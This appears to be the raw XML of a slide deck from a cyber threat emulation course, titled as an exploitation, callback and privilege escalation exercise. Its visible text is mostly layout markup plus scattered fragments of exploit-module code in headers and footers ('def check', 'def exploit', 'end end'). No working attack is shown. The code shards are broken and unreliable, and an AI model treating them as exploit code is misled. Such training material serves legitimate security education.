        <w:spacing w:after="1268" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation, callback &amp; privilege escalation exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E8C85" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E125E6C" wp14:editId="21BD51EB">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="298313" name="Picture 2983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8313" name="Picture 298313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363980" cy="1036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31B34B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1080" w:right="13506"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16908" w:type="dxa"/>
        <w:tblInd w:w="140" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="40" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="56" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16908"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="1B6A6611" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2544"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="169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5CB80A27" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/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725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76FC616F" wp14:editId="4B32E0F3">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>3911918</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>0</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6789420" cy="563880"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="341225" name="Group 34122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6789420" cy="563880"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="6789420" cy="56388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03948" name="Picture 303948"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId20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4587240" y="0"/>
                                  <a:ext cx="2202180" cy="54102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340858" name="Picture 340858"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId209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569721" cy="54864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303907" name="Picture 303907"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId210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2430780" y="541020"/>
                                  <a:ext cx="1455420" cy="2286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anchor>
                  </w:drawing>
                </mc:Choice>
                <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <w:pict>
                    <v:group id="Group 341225" style="width:534.6pt;height:44.4pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:308.025pt;mso-position-vertical-relative:text;margin-top:0pt;" coordsize="67894,5638">
                      <v:shape id="Picture 303948" style="position:absolute;width:22021;height:5410;left:45872;top:0;" filled="f">
                        <v:imagedata r:id="rId211"/>
                      </v:shape>
                      <v:shape id="Picture 340858" style="position:absolute;width:15697;height:5486;left:0;top:0;" filled="f">
                        <v:imagedata r:id="rId212"/>
                      </v:shape>
                      <v:shape id="Picture 303907" style="position:absolute;width:14554;height:228;left:24307;top:5410;" filled="f">
                        <v:imagedata r:id="rId213"/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79ECAD67" wp14:editId="07C5548A">
                  <wp:extent cx="2263140" cy="1554480"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340860" name="Picture 34086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0860" name="Picture 340860"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId2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63140" cy="1554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88"/>
              </w:rPr>
              <w:t>End of Module 2, Lesson 1 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3848D905" wp14:editId="5DBA7912">
                  <wp:extent cx="2202180" cy="426720"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="303934" name="Picture 30393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3934" name="Picture 303934"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId2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2180" cy="4267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55C382BA" wp14:editId="487AF595">
                  <wp:extent cx="2202180" cy="586740"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="303962" name="Picture 30396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3962" name="Picture 303962"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId2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2180" cy="586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BDA633B" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D33"/>
    <w:sectPr w:rsidR="006F6D33">
      <w:headerReference w:type="even" r:id="rId217"/>
      <w:headerReference w:type="default" r:id="rId218"/>
      <w:footerReference w:type="even" r:id="rId219"/>
      <w:footerReference w:type="default" r:id="rId220"/>
      <w:headerReference w:type="first" r:id="rId221"/>
      <w:footerReference w:type="first" r:id="rId222"/>
      <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
      <w:pgMar w:top="1314" w:right="870" w:bottom="180" w:left="1080" w:header="156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64E4518" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="245685B3" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D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00063C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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C96868" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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00F86F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1464" w:right="17760"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="32DCA54A" wp14:editId="55BDE551">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="3" name="Picture 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911" name="Picture 2911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63980" cy="10363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5F0926" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1464" w:right="17760"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="711341AB" wp14:editId="0ACB36E2">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="4" name="Picture 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911" name="Picture 2911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63980" cy="10363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CF83E3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
</w:ftr>
</file>

<file path=word/footer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A3B867" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
</w:ftr>
</file>

<file path=word/footer1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7A448B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
</w:ftr>
</file>

<file path=word/footer1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8F3DA3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
      <w:ind w:left="255" w:right="14640" w:firstLine="495"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end end</w:t>
    </w:r>
  </w:p>
</w:ftr>
</file>

<file path=word/footer1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AB60D3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
      <w:ind w:left="255" w:right="14640" w:firstLine="495"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end end</w:t>
    </w:r>
  </w:p>
</w:ftr>
</file>

<file path=word/footer1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13100D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
      <w:ind w:left="255" w:right="14640" w:firstLine="495"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end end</w:t>
    </w:r>
  </w:p>
</w:ftr>
</file>

<file path=word/footer1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391923" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="3720"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>include?( '35e' )</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="11860B51" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="4095"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="54"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t>Unknown,</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5E6CCD5C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="750"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end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35E32D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1485" w:right="17604"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="26240957" wp14:editId="4F870E38">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="2911" name="Picture 291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911" name="Picture 2911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63980" cy="10363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2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31E2B5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="3720"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>include?( '35e' )</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5ED329FF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="4095"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="54"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t>Unknown,</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="65FEF938" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="750"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end</w:t>
    </w:r>
  </w:p>
</w:ftr>
</file>

<file path=word/footer2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E8F4C1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
</w:ftr>
</file>

<file path=word/footer2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A7E2DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
</w:ftr>
</file>

<file path=word/footer2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C12BB8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
</w:ftr>
</file>

<file path=word/footer2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73A513" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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827855" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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AEADD4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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0D1F69" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1224" w:right="17025"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="0B395C5A" wp14:editId="3298B2A7">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"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911" name="Picture 2911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63980" cy="10363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7905E8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1224" w:right="17025"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="270A6EDC" wp14:editId="564BBE9E">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/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911" name="Picture 2911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63980" cy="10363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B508FD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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BF7216" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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096677" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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227573" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03C534F1" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D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2300F0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1101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51538C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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7DA303" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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2EF8E9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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009906" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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CD7AE1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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9F26C0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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714280" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="707" w:lineRule="auto"/>
      <w:ind w:left="90" w:right="12105" w:hanging="1140"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="50"/>
      </w:rPr>
      <w:t xml:space="preserve">I </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t xml:space="preserve">Cyber </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="40"/>
      </w:rPr>
      <w:t xml:space="preserve">Threat Emulation </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t>def check</w:t>
    </w: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B66ABF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="707" w:lineRule="auto"/>
      <w:ind w:left="90" w:right="12105" w:hanging="1140"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="50"/>
      </w:rPr>
      <w:t xml:space="preserve">I </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t xml:space="preserve">Cyber </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="40"/>
      </w:rPr>
      <w:t xml:space="preserve">Threat Emulation </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t>def check</w:t>
    </w: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FCB6B7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="707" w:lineRule="auto"/>
      <w:ind w:left="90" w:right="12105" w:hanging="1140"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="50"/>
      </w:rPr>
      <w:t xml:space="preserve">I </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t xml:space="preserve">Cyber </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="40"/>
      </w:rPr>
      <w:t xml:space="preserve">Threat Emulation </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t>def check</w:t>
    </w:r>
  </w:p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E84E1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="636"/>
      <w:ind w:left="-1050"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="5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  <w:p w14:paraId="7F0932A7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="90"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t xml:space="preserve">def </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>exploi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9BF5A2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1101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F64D7A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="636"/>
      <w:ind w:left="-1050"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="5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  <w:p w14:paraId="6E073D40" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="90"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
      <w:t xml:space="preserve">def </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>exploit</w:t>
    </w:r>
  </w:p>
</w:hdr>
</file>

<file path=word/header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050A32" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1056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2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0CA551" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-696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2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F349CB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-696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2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E67A28" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-696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DFED35" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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A7153B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-840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8AA923" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-840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A0C4AE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-840"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE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152620" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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045313" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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209F54" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1080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 id="_x0000_i1076" style="width:2pt;height:2pt" coordsize="" o:spt="100" o:bullet="t" adj="0,,0" path="" stroked="f">
        <v:stroke joinstyle="miter"/>
        <v:imagedata r:id="rId1" o:title="image202"/>
        <v:formulas/>
        <v:path o:connecttype="segments"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:numPicBullet w:numPicBulletId="1">
    <w:pict>
      <v:shape id="_x0000_i1077" style="width:2.65pt;height:2.65pt" coordsize="" o:spt="100" o:bullet="t" adj="0,,0" path="" stroked="f">
        <v:stroke joinstyle="miter"/>
        <v:imagedata r:id="rId2" o:title="image53"/>
        <v:formulas/>
        <v:path o:connecttype="segments"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="01511F1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F23830"/>
    <w:lvl w:ilvl="0" w:tplc="0CB6DF1A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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1" w:tplc="8662FC3A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2" w:tplc="EF80825E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3" w:tplc="EB3C0B0E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4" w:tplc="5D1A1230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5" w:tplc="24402136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6" w:tplc="705CF122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7" w:tplc="64E2A0C8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8" w:tplc="CA04790C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55C439D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32AC5B0C"/>
    <w:lvl w:ilvl="0" w:tplc="2D7E87CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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1" w:tplc="BE30C506">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12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2" w:tplc="240C6C6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="19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3" w:tplc="F5960EE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="27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4" w:tplc="80F24116">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="34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5" w:tplc="5B8C8C8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="41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6" w:tplc="C42A2368">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="48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7" w:tplc="ACDAA428">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="55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8" w:tplc="0004198A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="63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01B1026"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BA0B1AC"/>
    <w:lvl w:ilvl="0" w:tplc="85DE253E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3A1A76E4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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7AB84ACC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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
